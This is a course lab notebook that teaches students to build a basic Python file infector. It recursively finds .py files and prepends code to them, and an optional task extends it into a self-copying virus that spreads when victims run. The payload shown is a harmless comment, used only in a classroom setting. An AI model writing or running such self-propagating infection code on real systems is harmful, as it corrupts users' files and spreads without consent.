<a href="https://colab.research.google.com/github/carlosfmorenog/MLCyberSec/blob/main/Example_Malware.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Malware in Python

In this laboratory, we will learn how to create a very basic piece of malware using Python. You will also reflect on how this malware could propagate in a virtual machine environment.

## Basic Requirements

For this activity, you need the `os` Python module. It is part of the Python standard library, so no installation is required (there is no need to run `pip install`). You also need the following files:
* `victim1.py`: This script simply prints "Hello world!". If you are working locally on your computer, save it in the same directory that you are using for this notebook. Otherwise, we will load it directly from GitHub.
* `victim2.py`: This code cracks a hashed password using a brute force approach (as seen in [Example_Passwords.ipynb](https://colab.research.google.com/drive/1sLa1N09ul_RFLt0_ypAPUPZjMc_zNiR-#scrollTo=cZkF6bskp51f)). If you are working locally on your computer, save it in a subdirectory of the path where this notebook is saved (you can use any name for the subdirectory). Otherwise, we will load it directly into a subdirectory called `Data` via GitHub.

Run the following cell to load the two `.py` files from my GitHub repository:

In [1]:
!git clone https://github.com/carlosfmorenog/MLCyberSecMalware

Cloning into 'MLCyberSecMalware'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 12 (delta 2), reused 8 (delta 1), pack-reused 0
Receiving objects: 100% (12/12), done.
Resolving deltas: 100% (2/2), done.


## Implementing Malware in Python from Scratch

As you know, one of the main characteristics of malware is that it inserts itself into a system (usually in a secret way) with the intent of compromising a program or the whole system. In this laboratory activity, we will design a simple Python program that replicates itself into other `.py` files.

### Search for .py files

**STEP 1**: We will implement a function called `search` which will be in charge of exploring a directory and its subdirectories to find all `.py` files. First, you need to extract the list of files and subdirectories located in the current directory. You can do this with the command `filelist = os.listdir(path)`, where `path` is the current directory.

**HINT**: If you got the data from GitHub, you can use the command `os.path.abspath("MLCyberSecMalware")`. Otherwise, you should use `os.path.abspath("")`.

In [2]:
## Use this cell to
## 1) import the os module,
## 2) find the list of files/directories in the current directory and save them in a variable "filelist" and,
## 3) print filelist.
import os
filelist = os.listdir(os.path.abspath("MLCyberSecMalware"))
filelist

['Data', 'victim1.py', '.git']

If you followed the instructions correctly, you should see the contents of the cloned `MLCyberSecMalware` folder: `victim1.py`, the `Data` folder where `victim2.py` is saved, and the `.git` folder. If you list the current directory instead (using `os.path.abspath("")`), Colab shows `.config`, `sample_data` and `MLCyberSecMalware`, while on your own computer you will see this notebook and a folder called `.ipynb_checkpoints`.

**STEP 2**: Using a `for` loop, iterate over `filelist` to see which files have the `.py` extension.

**HINT**: When you iterate over `filelist` you are examining strings, so you can check whether the last 3 characters of any given string are `.py`. Once you have found a string that ends in `.py`, remember to **add** the path of the directory being searched to the name of the file, separated by the `/` character (or `\\` on Windows), before appending it to the list.
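The check described in the hint can also be written with `str.endswith` and `os.path.join`. The following is only a minimal sketch: the names `example_names`, `example_path`, `python_files` and `full_paths` are made up for illustration, and the list of names is hard-coded rather than read from disk.

```python
import os

# Hypothetical directory listing, standing in for the result of os.listdir(path).
example_names = ["Data", "victim1.py", ".git", "notes.txt"]
example_path = os.path.abspath("MLCyberSecMalware")

# name.endswith(".py") gives the same answer as name[-3:] == ".py".
python_files = [name for name in example_names if name.endswith(".py")]

# os.path.join inserts the separator that matches the operating system.
full_paths = [os.path.join(example_path, name) for name in python_files]
print(full_paths)
```

Using `os.path.join` avoids having to choose between `/` and `\\` by hand, which is why it is often preferred over string concatenation.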

In [3]:
## Use this cell to iterate filelist and find the .py files. If one is found, append it to a "filestoinfect" list.
## In the end, print "filestoinfect".
filestoinfect = []
for name in filelist:
    if name[-3:] == ".py":
        filestoinfect.append(os.path.abspath("MLCyberSecMalware")+"/"+name)
filestoinfect

['/content/MLCyberSecMalware/victim1.py']

If you have done this correctly, the list contains `victim1.py` (plus any other `.py` file saved in that directory, such as the malware script once you create it) but **NOT** `victim2.py`. This is because we have only explored one directory, not its subdirectories!

**STEP 3**: Using a `for` loop, iterate over `filelist` once again to **print** the names of the subdirectories.

**HINT**: You can use the command `os.path.isdir("MLCyberSecMalware/"+name)` to check whether a given name in `filelist` is a directory.

In [4]:
## Use this cell to iterate filelist and print the subdirectories.
for name in filelist:
    if os.path.isdir("MLCyberSecMalware/"+name):
        print("MLCyberSecMalware/"+name)

MLCyberSecMalware/Data
MLCyberSecMalware/.git


If you have done this step correctly, you will print the subdirectories of the path you are exploring, including `Data`, where `victim2.py` is stored. If you are doing this exercise online, a folder called `.git` will also appear, and if you are working locally on your computer, you will see a folder called `.ipynb_checkpoints`, which Jupyter Notebook generates automatically for autosaves.
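To see `os.path.isdir` at work without depending on the cloned repository, here is a small sketch that builds a throwaway directory tree with `tempfile`. The folder and file names mirror the lab, but the tree itself (and the variable names `root` and `subdirs`) are assumptions made for illustration.

```python
import os
import tempfile

# Build a temporary tree: one subdirectory and one file.
with tempfile.TemporaryDirectory() as root:
    os.mkdir(os.path.join(root, "Data"))
    with open(os.path.join(root, "victim1.py"), "w") as f:
        f.write('print("Hello world!")\n')

    # Keep only the entries that are directories; sorted() makes the order predictable.
    subdirs = sorted(
        name for name in os.listdir(root)
        if os.path.isdir(os.path.join(root, name))
    )

print(subdirs)
```

Note that `os.path.isdir` receives the full path, not just the name; a bare name would be resolved relative to the current working directory.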

**STEP 4**: Now that we have all of these elements, create a `search()` function which will take a `path` as an input and will return the list of files to infect.

In [5]:
## Use this cell to implement the search function.
import os
def search(path):
    # 1. Define "filestoinfect" as an empty list.
    filestoinfect = []
    # 2. Find the list of files/directories in the specified path and save them in variable "filelist".
    filelist = os.listdir(path)
    # 3. for name in filelist:
    for name in filelist:
        # 3.a. Check if name is a subdirectory. If true, call again the search function in this subdirectory.
        # HINT: To avoid resetting filestoinfect when you call the function, use filestoinfect.extend(search(path+"/"+name))
        # The check must use the path being searched, otherwise nested subdirectories are not detected.
        if os.path.isdir(path+"/"+name):
            filestoinfect.extend(search(path+"/"+name))
        # 3.b. Else, if it is a .py file, append it to "filestoinfect"
        elif name[-3:] == ".py":
            filestoinfect.append(path+"/"+name)
    return filestoinfect

## Use the search function in the current directory
filestoinfect = search(os.path.abspath("MLCyberSecMalware"))
print("List of files to infect:\n")
print(filestoinfect)

List of files to infect:

['/content/MLCyberSecMalware/Data/victim2.py', '/content/MLCyberSecMalware/victim1.py']


If the function was implemented correctly, the output lists the two victim files (and the malware script, if it is saved under the searched path).
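For comparison, the same recursive exploration can be done with the standard library function `os.walk`, which visits every subdirectory for you. This is a sketch of an alternative, not the approach the lab asks you to implement; `search_with_walk` is a hypothetical helper name, and the directory tree is created temporarily for the demonstration.

```python
import os
import tempfile

def search_with_walk(path):
    """Return the sorted paths of all .py files found under path."""
    found = []
    # os.walk yields one (directory, subdirectories, files) tuple per directory.
    for dirpath, dirnames, filenames in os.walk(path):
        for name in filenames:
            if name.endswith(".py"):
                found.append(os.path.join(dirpath, name))
    return sorted(found)

# Demonstrate on a temporary tree that mimics the layout used in this lab.
with tempfile.TemporaryDirectory() as root:
    os.mkdir(os.path.join(root, "Data"))
    for relative in ("victim1.py", os.path.join("Data", "victim2.py"), "readme.txt"):
        with open(os.path.join(root, relative), "w") as f:
            f.write("# placeholder\n")
    # Store paths relative to the temporary root so they are easy to read.
    found_names = [os.path.relpath(p, root) for p in search_with_walk(root)]

print(found_names)
```

Writing the recursion by hand, as in `search()`, is still a useful exercise because it makes the base case (a file) and the recursive case (a directory) explicit.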

### Infect .py files

To infect the files, you have to loop over the `filestoinfect` list and infect each file in turn. The infection consists of two steps:
1. Loading the file to be infected and storing the instructions of the `.py` file in a *temp* variable.
2. Adding the malware to the temp and rewriting the loaded file.

In [7]:
def infect(filestoinfect):
    malware = '# This file is infected by malware!\n'
    for name in filestoinfect:
        # 1. Open the file and load its instructions into a temp variable (the file is closed automatically).
        with open(name) as f:
            temp = f.read()
        # 2. Reopen the file in "write mode" and write the malware followed by the original instructions.
        with open(name, 'w') as f:
            f.write(malware+temp)

infect(filestoinfect)

Now, inspect the victim files and check whether the first line of each file contains the malware.
The first line of the code should be: `# This file is infected by malware!`
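Instead of opening each file by hand, you can read its first line programmatically. The sketch below assumes the marker line defined in `infect()` above; `first_line` is a hypothetical helper, and the sample file is written to a temporary directory so that it does not touch the real victim files.

```python
import os
import tempfile

def first_line(path):
    """Return the first line of a text file without its trailing newline."""
    with open(path) as f:
        return f.readline().rstrip("\n")

# Demonstrate on a throwaway file that mimics an infected victim.
with tempfile.TemporaryDirectory() as root:
    sample = os.path.join(root, "sample.py")
    with open(sample, "w") as f:
        f.write('# This file is infected by malware!\nprint("Hello world!")\n')
    header = first_line(sample)

print(header)
```

In the notebook you could call `first_line(name)` for each `name` in `filestoinfect` to confirm the result.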

**OPTIONAL TASK**: Create a Python file called `malware.py` and paste the `search()` and `infect()` functions into it. Apply the following changes to the functions:
* `search()`: Implement a mechanism that **EXCLUDES** `malware.py`, the file that is running the malware, from the `filestoinfect` list (**HINT**: Use a marker).
* `infect()`: Infect the victim files using **the code contained in `malware.py`** instead, so that when an unsuspecting user runs a victim file, the malware keeps propagating!
* General: Print a message (for instance, "THE MALWARE IS OUT! $N$ FILES HAVE BEEN INFECTED!"), where $N$ is the number of files that have been infected by the malware (**HINT**: use a counter inside the `infect()` function).

**NOTE**: Make sure that the very last line of `malware.py` is empty, so that when the code is copied into the victims, it doesn't overlap the first instruction of the victim.
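The effect of a missing final newline can be checked with plain strings. In this sketch the two snippets are made-up stand-ins for the last line of one file and the first line of another, and `is_valid_python` is a hypothetical helper built on the built-in `compile()` function.

```python
# Hypothetical snippets: the end of the prepended code and the start of a victim file.
prepended_without_newline = 'status = "ready"'
prepended_with_newline = 'status = "ready"\n'
victim_code = 'print("Hello world!")\n'

# Without the final newline, the two statements end up on the same line.
merged_bad = prepended_without_newline + victim_code
merged_good = prepended_with_newline + victim_code

def is_valid_python(source):
    """Return True if source compiles as Python code, False on a SyntaxError."""
    try:
        compile(source, "<example>", "exec")
        return True
    except SyntaxError:
        return False

print(merged_bad.splitlines(), is_valid_python(merged_bad))
print(merged_good.splitlines(), is_valid_python(merged_good))
```

The first combination collapses into a single invalid line, while the second keeps the two statements on separate lines.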

In [8]:
!git clone https://github.com/carlosfmorenog/MLCyberSecMalware2

Cloning into 'MLCyberSecMalware2'...
remote: Enumerating objects: 35, done.

In [9]:
#Now, let's run the malware!
!python /content/MLCyberSecMalware2/malware.py

List of files to infect:

['/content/MLCyberSecMalware2/Data/victim2.py', '/content/MLCyberSecMalware2/victim1.py']


Note that both files are infected in the notebook's local copy of the repository, not on GitHub!